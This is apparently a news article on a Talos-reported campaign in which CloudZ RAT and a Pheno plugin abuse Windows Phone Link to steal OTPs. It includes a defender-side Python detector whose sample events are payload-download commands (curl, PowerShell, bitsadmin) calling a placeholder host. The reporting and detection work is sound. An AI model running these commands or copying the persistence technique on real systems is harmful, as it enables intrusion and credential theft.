Cybersecurity researchers at Cisco Talos have uncovered a sophisticated intrusion campaign that has been active since at least January 2026. Unknown threat actors are deploying a new remote access tool called CloudZ RAT, along with a previously undocumented plugin named Pheno. The campaign’s primary goal is to silently harvest victims’ credentials and intercept multi-factor authentication codes, specifically one-time passwords (OTPs). Instead of trying to infect a mobile device directly, the attackers have devised a clever workaround by targeting the bridge between a user’s computer and their smartphone.
The Phone Link Vulnerability: A New Attack Vector
What makes this campaign particularly insidious is its abuse of Microsoft’s Phone Link application. This built-in Windows tool mirrors a smartphone’s notifications and messages onto a PC screen via Bluetooth and Wi-Fi. Because Phone Link synchronizes data such as SMS messages, call logs, and application notifications to a local SQLite database on the computer, the attackers do not need to deploy mobile malware at all. Once the PC is compromised, the custom Pheno plugin continuously monitors for active Phone Link processes; if it detects an active connection, the attackers can intercept the local database files to read incoming SMS and authenticator app notifications in real time. It’s a bit like picking the lock on a secure vault by stealing the key from the guard’s lunchbox instead of cracking the vault itself.
Attack Chain: From Fake Updates to Full Control
The attack chain begins when a victim is tricked into running a fake ScreenConnect application update, often disguised as a file named systemupdates.exe. This malicious file acts as an initial dropper, deploying a Rust-compiled loader onto the system. To establish a permanent foothold, the dropper executes a hidden PowerShell script that creates a scheduled task on the Windows machine. This task ensures the malware runs whenever the system starts by using a legitimate Windows registration tool called regasm.exe to silently execute an intermediate .NET loader without raising immediate suspicion. Once the environment is deemed safe, the loader deploys the modular CloudZ RAT directly into the system’s memory to avoid antivirus detection. Imagine a burglar who convinces a security guard to let them inside by pretending to be a repairman, then hides in the building’s ventilation shafts until nightfall.
Persistence and Evasion Tactics
CloudZ connects to its command-and-control (C2) server by retrieving secondary configuration data hosted on attacker-controlled Pastebin accounts using the handler name HELLOHIALL. To blend in with normal network traffic, the malware rotates through standard web browser user-agent strings, essentially dressing up as a regular Chrome or Firefox session. According to Talos Intelligence research, the most critical module deployed by CloudZ is the Pheno plugin, which is downloaded using a three-step fallback approach that sequentially tries command-line tools such as curl, PowerShell, or bitsadmin to ensure a successful installation. If one method fails, the attackers simply try the next one, like a persistent telemarketer who keeps calling until someone picks up.
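As an added defender-side illustration (not code from the Talos report), the two behaviours described above, a scheduled task launching regasm.exe against an assembly outside the .NET framework directories, and the curl/PowerShell/bitsadmin download fallback spawned from one parent process, can be expressed as detection logic over process-creation telemetry. The records, field names, user paths and URL below are constructed; the Task Scheduler parent is assumed to appear as svchost.exe with "Schedule" on its command line.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed telemetry shape (hypothetical field names), not a real EDR schema.
LEGIT_ASSEMBLY_DIRS = ("c:\\windows\\microsoft.net\\", "c:\\program files\\")
DOWNLOADERS = {"curl.exe", "powershell.exe", "bitsadmin.exe"}
FALLBACK_WINDOW = timedelta(minutes=2)
TOKEN = re.compile(r'"[^"]*"|\S+')  # split a command line, keeping quoted paths whole

def regasm_outside_framework(ev):
    # regasm.exe started by the scheduler host (assumed: svchost.exe with "Schedule" in its cmdline) with a non-framework assembly
    if ev["image"].lower() != "regasm.exe":
        return False
    from_scheduler = (ev["parent_image"].lower() == "svchost.exe"
                      and "schedule" in ev["parent_cmdline"].lower())
    args = [t.strip('"').lower() for t in TOKEN.findall(ev["cmdline"])][1:]
    assemblies = [a for a in args if a.endswith((".dll", ".exe"))]
    return from_scheduler and any(not a.startswith(LEGIT_ASSEMBLY_DIRS) for a in assemblies)

def fallback_download_chains(events):
    # parent PIDs that spawned two or more distinct downloader tools with a URL on the command line inside FALLBACK_WINDOW
    by_parent = defaultdict(list)
    for ev in events:
        if ev["image"].lower() in DOWNLOADERS and "http" in ev["cmdline"].lower():
            by_parent[ev["parent_pid"]].append(ev)
    flagged = []
    for ppid, evs in by_parent.items():
        times = [e["time"] for e in evs]
        if len({e["image"].lower() for e in evs}) >= 2 and max(times) - min(times) <= FALLBACK_WINDOW:
            flagged.append(ppid)
    return flagged

def ev(time, image, parent_image, parent_pid, cmdline, parent_cmdline=""):
    return {"time": datetime.fromisoformat(time), "image": image, "parent_image": parent_image,
            "parent_pid": parent_pid, "cmdline": cmdline, "parent_cmdline": parent_cmdline}

REGASM = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe"
SAMPLE_EVENTS = [  # constructed sample records; user paths and URL are placeholders
    ev("2026-03-01T08:00:00", "regasm.exe", "svchost.exe", 1100,
       f'"{REGASM}" /U "C:\\Users\\u\\AppData\\Roaming\\update\\loader.dll"', "svchost.exe -k netsvcs -p -s Schedule"),
    ev("2026-03-01T08:05:00", "regasm.exe", "msiexec.exe", 1200,
       f'"{REGASM}" /codebase "C:\\Program Files\\Vendor\\vendor.dll"'),
    ev("2026-03-01T08:10:00", "curl.exe", "loader.exe", 4242, "curl.exe -o p.bin http://example.invalid/p"),
    ev("2026-03-01T08:10:05", "powershell.exe", "loader.exe", 4242,
       "powershell.exe -c Invoke-WebRequest http://example.invalid/p -OutFile p.bin"),
    ev("2026-03-01T08:10:12", "bitsadmin.exe", "loader.exe", 4242,
       "bitsadmin.exe /transfer j http://example.invalid/p C:\\Users\\u\\p.bin"),
]
```

The first record (scheduler-launched regasm.exe with an AppData assembly) and the three-tool chain under parent 4242 are flagged; the vendor installer's regasm.exe call is not.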
How Pheno Exploits Phone Link’s Synchronization
Once active, Pheno conducts reconnaissance on the victim’s Phone Link application by searching for running processes containing keywords such as PhoneExperienceHost. It specifically looks for local proxy connections that indicate traffic is actively routing between the PC and the phone. By confirming this active relay channel, Pheno flags the system as maybe connected, enabling the attackers to systematically harvest sensitive OTPs and bypass multi-factor authentication protections entirely from the compromised computer. This means that even if users have enabled two-factor authentication on their accounts, the attackers can intercept the verification codes sent via SMS or authenticator apps before the user even sees them. It’s a chilling reminder that MFA is not a silver bullet when an attacker controls the device that receives those codes.
The campaign’s clever use of Phone Link highlights a growing trend in cyberattacks: rather than fighting against security mechanisms head-on, threat actors are finding ways to exploit the features designed to make our lives easier. The attackers aren’t breaking into phones; they’re simply reading the synchronized data on a PC that they already own. For organizations relying heavily on MFA, this serves as a stark wakeup call. The attackers have effectively turned a productivity tool into a surveillance device, and they’re doing it without any mobile malware whatsoever.
As cyber defenders continue to emphasize the importance of multi-factor authentication, attackers are evolving their techniques to circumvent it. This campaign shows that MFA codes are only as secure as the device that receives them. If your PC is compromised, your phone’s notifications might as well be posted on a billboard. Looking ahead, we should expect more attacks that abuse synchronization features between devices. The very bridges we build for convenience can become highways for attackers, and the security industry needs to start gatekeeping those routes with the same rigor as the endpoints themselves.